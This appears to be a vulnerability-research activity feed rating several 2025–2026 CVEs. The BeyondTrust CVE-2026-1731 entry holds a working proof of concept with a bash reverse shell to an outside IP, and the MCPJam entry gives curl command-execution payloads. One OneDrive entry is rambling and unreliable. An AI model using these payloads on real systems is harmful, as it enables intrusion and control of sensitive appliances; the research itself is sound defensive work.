Activity Feed
Technical Analysis
CVE-2025-40551 is one of four critical vulnerabilities affecting SolarWinds Web Help Desk that were patched on January 28, 2026. The vulnerability, which was reported to SolarWinds by Jimi Sebree of Horizon3.ai, is an unsafe deserialization bug, and it facilitates unauthenticated remote code execution on affected Web Help Desk systems. The issue is a patch bypass for a vulnerability that had two prior patch bypasses – CVE-2024-28986, a deserialization security flaw in the AjaxProxy component. This vulnerability, along with patch bypasses, have been added to the CISA KEV catalog.
CVE-2025-40551 is exploited by using a different URI path than previous exploits did, bypassing sanitization measures. That, along with the inclusion of some whitelisted terms, sidesteps defensive checks that had previously been implemented to prevent exploitation. The Horizon3.ai writeup published by the original finders demonstrated a simple JNDI lookup gadget, but weaponized exploits for Web Help Desk on Windows and Linux are now available.
I’ve rated ‘Attacker Value’ as ‘Very High’, since the software is popular, it sees exploitation in the wild, and help desk software tends to contain a lot of sensitive information. I’ve rated ‘Exploitability’ as ‘Very High’, since the bug class is a reliable one and weaponized gadget chains are available.
Technical Analysis
CVE-2026-1340 and CVE-2026-1281 are two very similar critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) that were announced on January 29, 2026. The impact of exploitation of the vulnerabilities is unauthenticated root-level remote code execution on a sensitive mobile device endpoint management system, making these bugs valuable to attackers; an attacker that compromises EPMM would typically gain access to a wealth of PII collected from joined mobile endpoints, along with a privileged position over the devices themselves. Notably, at the time of disclosure, Ivanti advised that exploitation in the wild led to the discovery of the vulnerabilities, and CISA added an entry to the KEV catalog shortly after disclosure.
The security firm watchTowr published an excellent technical writeup that includes a proof-of-concept exploit, and a Rapid7 Metasploit module PR has been opened. I’ve rated ‘Attacker Value’ as ‘Very High’, since breaching EPMM also results in the compromise of sensitive information held by the many devices managed by it. I’ve rated ‘Exploitability’ as ‘Very High’, since the attack vector is a web API request and the bug class is a reliable one.
Technical Analysis
CVE-2026-1281 and CVE-2026-1340 are two very similar critical vulnerabilities affecting Ivanti Endpoint Manager Mobile (EPMM) that were announced on January 29, 2026. The impact of exploitation of the vulnerabilities is unauthenticated root-level remote code execution on a sensitive mobile device endpoint management system, making these bugs valuable to attackers; an attacker that compromises EPMM would typically gain access to a wealth of PII collected from joined mobile endpoints, along with a privileged position over the devices themselves. Notably, at the time of disclosure, Ivanti advised that exploitation in the wild led to the discovery of the vulnerabilities, and CISA added an entry to the KEV catalog shortly after disclosure.
The security firm watchTowr published an excellent technical writeup that includes a proof-of-concept exploit, and a Rapid7 Metasploit module PR has been opened. I’ve rated ‘Attacker Value’ as ‘Very High’, since breaching EPMM also results in the compromise of sensitive information held by the many devices managed by it. I’ve rated ‘Exploitability’ as ‘Very High’, since the attack vector is a web API request and the bug class is a reliable one.
Technical Analysis
Overview
On February 6, 2026, BeyondTrust published an advisory for a new critical command injection vulnerability, CVE-2026-1731, affecting their products Remote Support (RS) and Privileged Remote Access (PRA).
Rapid7 Labs has reproduced this new vulnerability. Notably, this new vulnerability is in the exact same endpoint as a previous high profile vulnerability CVE-2024-12356. While CVE-2024-12356 was exploited in-the-wild as a zero-day, this new vulnerability was reported to the vendor through coordinated disclosure, and there is no known exploitation in-the-wild at this time. The similarity, at a technical level, between the two issues highlights how critical this new vulnerability is in terms of exploitability, and the high value that targeting a solution like RS or PRA is to an attacker.
The following technical analysis details CVE-2026-1731. Our prior analysis of CVE-2024-12356 is recommended reading to better understand the target architecture and how to communicate to the affected endpoint.
Analysis
We begin by extracting the patch for CVE-2026-1731 – a file called BT26-02-RS.nss. We know from our prior analysis of CVE-2024-12356 that these patches are encrypted with a static key. Decrypting and extracting the contents of the patch reveals a number of interesting files; ./pre_scripts/bt26-02.sh, ./resources/thinA, ./resources/thinB, and ./resources/thinD.
sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ openssl enc -d -in BT26-02-RS.nss -md sha1 -pass pass:"Bingb0ng, what she said; the Tw1st3d switch is RED" -aes-256-cbc > ./BT26-02-RS.tar 2>/dev/null sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ tar -xvf BT26-02-RS.tar cert_chain.pem content signature signature.sha256 sne.version sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ cat content | gunzip - | tar -xv install application_patch.conf ingredi_patch.conf pre_scripts/ pre_scripts/bt26-02.sh resources/ resources/thinA resources/thinB resources/thinD sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al total 80 drwxrwxr-x 4 sfewer sfewer 4096 Feb 10 12:53 . drwxrwxr-x 4 sfewer sfewer 4096 Feb 10 12:52 .. -rw-r--r-- 1 sfewer sfewer 361 Feb 4 06:00 application_patch.conf -rw------- 1 sfewer sfewer 11104 Feb 10 08:30 BT26-02-RS.nss -rw-rw-r-- 1 sfewer sfewer 11081 Feb 10 12:53 BT26-02-RS.tar -rw-r--r-- 1 sfewer sfewer 1846 Feb 4 06:00 cert_chain.pem -rw-r--r-- 1 sfewer sfewer 8099 Feb 4 06:00 content -rw-r--r-- 1 sfewer sfewer 45 Feb 4 06:00 ingredi_patch.conf -rwxr--r-- 1 sfewer sfewer 7366 Feb 4 06:00 install drwxr-xr-x 2 sfewer sfewer 4096 Feb 4 06:00 pre_scripts drwxr-xr-x 2 sfewer sfewer 4096 Feb 4 06:00 resources -rw-r--r-- 1 sfewer sfewer 512 Feb 4 06:00 signature -rw-r--r-- 1 sfewer sfewer 512 Feb 4 06:00 signature.sha256 -rw-r--r-- 1 sfewer sfewer 2 Feb 4 06:00 sne.version sfewer@sfewer-ubuntu-vm:~/Desktop/beyondtrust2026/patch$ ls -al ./resources/ total 44 drwxr-xr-x 2 sfewer sfewer 4096 Feb 4 06:00 . drwxrwxr-x 4 sfewer sfewer 4096 Feb 10 12:53 .. -rw-r--r-- 1 sfewer sfewer 10570 Feb 4 06:00 thinA -rw-r--r-- 1 sfewer sfewer 10619 Feb 4 06:00 thinB -rw-r--r-- 1 sfewer sfewer 10570 Feb 4 06:00 thinD
Examining the bt26-02.sh shell script we can see that this script will patch the destination file $BG_app_root/app/thin-scc-wrapper with one of the three “thin” resource files – depending on the current version of the product. As our test system is running version 24.1.2 we will explore the file ./resources/thinB. We can note that the destination thin-scc-wrapper script is where CVE-2024-12356 was located, and is reachable by an unauthenticated attacker via a WebSocket connection.
#!/bin/bash # grab a few vars from the database BUILD_COMMIT_NUM=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_num'") BUILD_COMMIT_HASH=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_commit_hash'") BUILD_DATE=$($BG_database_primary_cmd -t -c "select value from fixed_config where variable = 'build_date'") # sedcp, lifted pretty much directly from mkar with only the vars we care about function sedcp # <srcfile> <destfile> { src=$1 shift 1 dest=$1 shift 1 SED_EXPRS=" s^%COMPANY%^$BG_company^g; s^%PRODUCT%^$BG_product^g; s^%VERSION%^$BG_version^g; s^%BUILD_VERSION%^$BG_version^g; s^%BUILD_COMMIT_NUM%^$BUILD_COMMIT_NUM^g; s^%BUILD_COMMIT_HASH%^$BUILD_COMMIT_HASH^g; s^%BUILD_DATE%^$BUILD_DATE^g; " sed -e "$SED_EXPRS" "$src" >"$dest" } function compare_versions # a.b.c[suffix] x.y.z[suffix] (the first one may be "UNKNOWN") { # this function compares the version string in $1 to the version string in $2 and returns # <0 if $1<$2 # ==0 if $1==$2 # >0 if $1>$2 if [[ -z "$1" || "$1" == "UNKNOWN" ]]; then # "" or UNKNOWN is less than anything on the right echo -1 return fi if [[ "$1" == "$2" ]]; then echo 0 return fi # the complex sed is to retain only the numeric version and strip off any given suffix from the version string v1=$(echo "$1" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/') v2=$(echo "$2" | sed -e 's/^\([0-9][0-9]*\.[0-9][0-9]*\.[0-9][0-9]*\)[^0-9].*/\1/') ver1=$(printf "%d%03d%03d" $(echo "$v1" | cut -f1 -d.) $(echo "$v1" | cut -f2 -d.) $(echo "$v1" | cut -f3 -d.) ) ver2=$(printf "%d%03d%03d" $(echo "$v2" | cut -f1 -d.) $(echo "$v2" | cut -f2 -d.) $(echo "$v2" | cut -f3 -d.) ) echo $(( $ver1 - $ver2 )) } # patch between 25.2.1 and 25.3.1 inclusive if [[ $(compare_versions $BG_version "25.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.3.1") -le 0 ]]; then echo Copying thinA over $BG_app_root/app/thin-scc-wrapper sedcp resources/thinA $BG_app_root/app/thin-scc-wrapper exit 0 fi # patch between 23.2.1 and 25.1.5 inclusive if [[ $(compare_versions $BG_version "23.2.1") -ge 0 ]] && [[ $(compare_versions $BG_version "25.1.5") -le 0 ]]; then echo Copying thinB over $BG_app_root/app/thin-scc-wrapper sedcp resources/thinB $BG_app_root/app/thin-scc-wrapper exit 0 fi # patch between 21.3.1 and 22.3.4 inclusive if [[ $(compare_versions $BG_version "21.3.1") -ge 0 ]] && [[ $(compare_versions $BG_version "22.3.4") -le 0 ]]; then echo Copying thinD over $BG_app_root/app/thin-scc-wrapper sedcp resources/thinD $BG_app_root/app/thin-scc-wrapper exit 0 fi
Diffing thinB against thin-scc-wrapper, shows a sanity check has been added to the attacker controlled input for a remote version number. The new sanity check ensures the version number is actually a number, and only contains numerical characters. With this in mind, we now need to explore how this could lead to command injection.
@@ -48,6 +48,12 @@ blog "reading remoteVersion" read -t 30 remoteVersion || exit 1 blog "read remoteVersion as [$remoteVersion]" +# Validate remote version is a number (single or two-digit) +if [[ ! "$remoteVersion" =~ ^[0-9]{1,2}$ ]]; then + blog "ERROR: Invalid remote version - must be a 1-2 digit number" + exit 1 +fi +
The thin-scc-wrapper script will read and process the versionNumber variable as follows:
# read their version number read -t 30 remoteVersion || exit 1 blog "read remoteVersion as [$remoteVersion]" # Assuming that the thin clients will be the more knowledgable of # speaking older protocol versions. They can look at the server version # and adjust to match easier than the trymax side. version="" if [[ "$localVersion" -lt "$remoteVersion" ]]; then version=$localVersion else version=$remoteVersion fi # now we both agree on the protocol version # ================================================================================================= # ================================================================================================= # ================================================================================================= if [[ $version -gt "$localVersion" ]]; then blog "unhandled protocol version [$version]" exit 1 fi
The command injection is present here but it is not immediately obvious unless you are very familiar with the nuances of Bash arithmetic evaluation. To assist us, we ask Gemini. The following Gemini response explains the problem very clearly:
Yes, there is a potential command injection (or more accurately, arbitrary code execution) vulnerability in this script.
While it looks like a simple numeric comparison, the way Bash handles the
[[ ... ]]construct with the-lt(less than) and-gt(greater than) operators involves Arithmetic Evaluation.The Vulnerability: Arithmetic Evaluation
In Bash, when using arithmetic operators like-lt,-gt, or-eqinside[[ ]], the shell treats the operands as expressions. If an attacker can control the value ofremoteVersion, they can pass a string that Bash will evaluate as code.How an attacker would exploit it:
If an attacker provides a payload like:
remoteVersion='a[$(touch /tmp/pwned)]0'When the script reaches this line:
if [[ "$localVersion" -lt "$remoteVersion" ]]; thenBash evaluates
remoteVersion. Because it sees the structure of an array index or an expression, it executes the command inside the subshell$(...)to determine the value.
Interestingly, a recent analysis by watchTowr for a different vulnerability in a different product (CVE-2026-1281 in Ivanti EPMM), published January 30, 2026, also shows a similar root cause due to arithmetic evaluation. We can note that the original finders of CVE-2026-1731, Hacktron, are using “AI-enabled variant analysis” for vulnerability discovery, so the recent work in this area may have helped their discovery, as they cite a date of January 31, 2026 as the discovery date – one day after the watchTowr analysis of CVE-2026-1281.
We now know that we can execute an arbitrary OS command by supplying a malicious version number as part of a WebSocket request, whereby the malicious version number will be in the form a[$(touch /tmp/pwned)].
We can construct a PoC for CVE-2026-1731 by modifying the PoC from our prior analysis. We need to connect to the WebSocket URI /nw. The remote service, i.e. the thin-scc-wrapper script, expects us to transmit a newline delimited sequence comprising a version number, a UUID for the “thin mint” cookie value, an authentication type, and a “gskey” value.
As we want to place our command injection in the version number, we construct our PoC as follows, with a bash reverse shell as the payload. The header value X-Ns-Company must be set to the target appliance’s company name (We have previously shown in our Metasploit module for CVE-2024-12356 how to programmatically extract the company name).
Note: the below $ is escaped as \$ as we are running this on the command line.
echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/192.168.1.23/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | ./websocat -k wss://192.168.1.105:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: myexamplecompany" --binary -n -
An NCat listener will catch the reverse shell.
Remediation
BeyondTrust has released patches to remediate CVE-2026-1731 for the following versions:
- Privileged Remote Access (PRA) version 24.3.4 and earlier
- Patch
BT26-02-PRA
- Patch
- Remote Support (RS) version 25.3.1 and earlier
- Patch
BT26-02-RS
- Patch
BeyondTrust customers are urged to apply this patch on an urgent basis.
References
Technical Analysis
On February 6, 2026, BeyondTrust released security advisory BT26-02, disclosing a critical remote code execution vulnerability affecting its Remote Support (RS) and Privileged Remote Access (PRA) products. Reported by Hacktron AI researchers and assigned CVE-2026-1731, exploitation allows unauthenticated, remote attackers to execute arbitrary operating system commands in the context of the site user by sending specially crafted requests. The vulnerability affects Remote Support (RS) versions 25.3.1 and prior, as well as Privileged Remote Access (PRA) versions 24.3.4 and prior.
While BeyondTrust automatically patched SaaS instances on February 2, 2026, self-hosted customers remain at risk until manual updates are applied. BeyondTrust has not reported active exploitation of CVE-2026-1731 in the wild, as of Feb 9, 2026, but the platform’s immense footprint makes it a high-priority target for sophisticated adversaries. BeyondTrust provides identity security services to more than 20,000 customers across over 100 countries, including 75% of the Fortune 100. Furthermore, past vulnerabilities in BeyondTrust software were leveraged by nation state attackers to breach the US Treasury in late 2024, triggering emergency directives by CISA.
Based on the stated impact of the vulnerability, the wide use of the affected software, and the sensitivity of the environments that the software is known to be deployed in, I’ve rated ‘Attacker Value’ as ‘Very High’. I’ve chosen to rate ‘Exploitability’ as ‘Very High’, since the vulnerability is an easily exploitable variant on a previous significantly impactful vulnerability in BeyondTrust software.
Technical Analysis
Summary
Out of the box, MCPJam runs without auth disabled and on 0.0.0.0, and local auth is not available; it has to be configured to auth to MCPJams servers (https://login.mcpjam.com/)
The patch only changes the default listener to run only on localhost, not on 0.0.0.0, meaning that if the user chooses to make it available on all interfaces, it will still be vulnerable.
If adding optional Auth in testing on the latest version the RCE is still achievable without needing auth. Auth appears to be for Cloud Sync of Secrets only not protecting access to the tool or the endpoints.
RCE Endpoints
The endpoint that allows for RCE /api/mcp/connect does so by design. This endpoint is supposed to run commands typically using NPX, Python, to start local MCP bridges or interfaces so this exploit is jsut abusing an existing feature bypassing auth.
Exploitation
Exploiting is pretty simple, as it’s not authenticated, you can just browse to the site and use the web UI. This also means burp, curl, and Python scripts could all trivially create payloads.
Example Payloads
For Nix / Docker
curl http://<TARGET_IP>:6274/api/mcp/connect \ --header "Content-Type: application/json" \ --data ' { "serverConfig": { "timeout": 10000, "command": "bash", "args": [ "-c", "echo pwned> /tmp/pwned", " ], "env": {} }, "serverId": "RandomServer" }.
For Windows
curl http://<TARGET_IP>:6274/api/mcp/connect \ --header "Content-Type: application/json" \ --data ' { "serverConfig": { "timeout": 10000, "command": "cmd.exe", "args": [ "/c", "calc", " ], "env": {} }, "serverId": "RandomServer" }'
Secrets
LLM API keys and EnvVars for the MCP servers would be the highest impact here, but these are not actually stored to disk; they are written to the browser’s local storage, meaning that any exploit attempt would have to pivot to exploiting the user’s browser session through something like XSS in order to retrieve those values.
Post Exploitation
Depending on how the MCPJam server is deployed, that may be easier or harder. If its deployed via docker then the attacker would have to edit the running application, which would not have persistence on reboots
If the MCPJam server is deployed on the host directly using npx as per the installation guide, then RCE results in full access as the user to the host operating system, which opens up a lot more avenues for post-exploitation.
Technical Analysis
This vulnerability allows scripting commands to load from SharePoint servers and one drive, when signing into OneDrive the malicious software will load onto the computer during sync operations and land as a vault executable. This vulnerability allows modifying of files and photos and is the attack entry point for creating a shadow account which then allows authorization for multiple sign ins and unauthorized access to bookmarks, history and credentials. They create scripts and save their commands and scripts inside of SharePoint and use graph connections to control AI services, which they can’t control remotely altering Chat behavior and exhilarating data from the AI services. These shadow accounts tie to malicious fake login pages where they use fake icon packs for icon smuggling and they use these packs on the computer to replace legitimate applications to trick the user into clicking, which send the user to the fake website where they continue to steal more resources and credentials. These APT threat actors use this to create profiles of their intended targets and to maintain persistent access with every device and network they get access to. They replace the files with executable content or delete and steal data. I have seen them use Cortana and the executable help.exe to use feedback hub, and for fake setup during reinstalling feature. They use the OneDrive to perform most of their operations especially using the sync feature to load their malicious code. These threat actors are the most sophisticated coders there are, it’s taken years of work to get them removed uncovering every layer that they have covered. They use the vault in one drive to steal the data then replace it with a RAT Trojan to execute when the user opens the vault.
Technical Analysis
CVE-2024-55591 is a critical severity authentication bypass affecting FortiOS and FortiProxy, facilitating full administrator-level control of the device with no existing level of access. The vulnerability’s official advisory was published on January 14, 2025. At the time of publication, the vulnerability was being exploited in the wild, per a zero-day exploitation report by Arctic Wolf. Subsequently, security firm watchTowr published an excellent technical analysis of the vulnerability, which outlines the details of exploitation.
The vulnerability is a complex one, encompassing a WebSocket access control issue, an internal parameter that can be provided to skip a stage of session checks, and a race condition in the Telnet interface. The result is reliable command-line interface access as the administrator via exploitation of the web service on a very widely deployed target that’s typically publicly exposed. I’ve rated ‘Attacker Value’ as ‘Very High’, for the aforementioned reasons. I’ve rated ‘Exploitability’ as ‘Very High’, since the exploit works quickly and reliably against the web service and results in full compromise of the target system.
Technical Analysis
This vulnerability was also discovered by Rapid7 during analysis of the NetScaler Console platform. Initially, Citrix indicated the issue was already fixed in their latest version and declined to assign a CVE. However, after further investigation in June 2025, the vendor determined the vulnerability is identified as CVE-2024-12284. It affects NetScaler Console and NetScaler Agent versions 14.1 before 14.1-38.53 and 13.1 before 13.1-56.18.
The vulnerability is a classic ZipSlip attack targeting the StyleBook import functionality. The StyleBook API, a Python microservice, allows administrators to import configuration bundles as ZIP or TAR archives via the /stylebook/nitro/v2/config/stylebooks/actions/import endpoint. When processing tar-gzipped files, the code calls tarfile.extractall() without validating member paths for directory traversal sequences. Malicious archives containing filenames with path traversal patterns (e.g., ../../../../../../../var/cron/tabs/root) are extracted directly to the filesystem. Since the extraction process runs as user ID 1000 with root-equivalent privileges, files can be written to any arbitrary location on the system, including protected directories.
This vulnerability enables authenticated attackers to achieve remote code execution as root by writing malicious files to privileged locations. The demonstrated proof-of-concept writes a cron job containing a reverse shell payload to /var/cron/tabs/root, which executes automatically and grants root shell access. When chained with CVE-2024-6235 (authentication bypass), attackers achieve unauthenticated remote code execution with full system control.
A full analysis can be found here: https://www.rapid7.com/blog/post/cve-2025-4365-cve-unassigned-netscaler-console-sdx-authenticated-arbitrary-file-read-write-fixed/
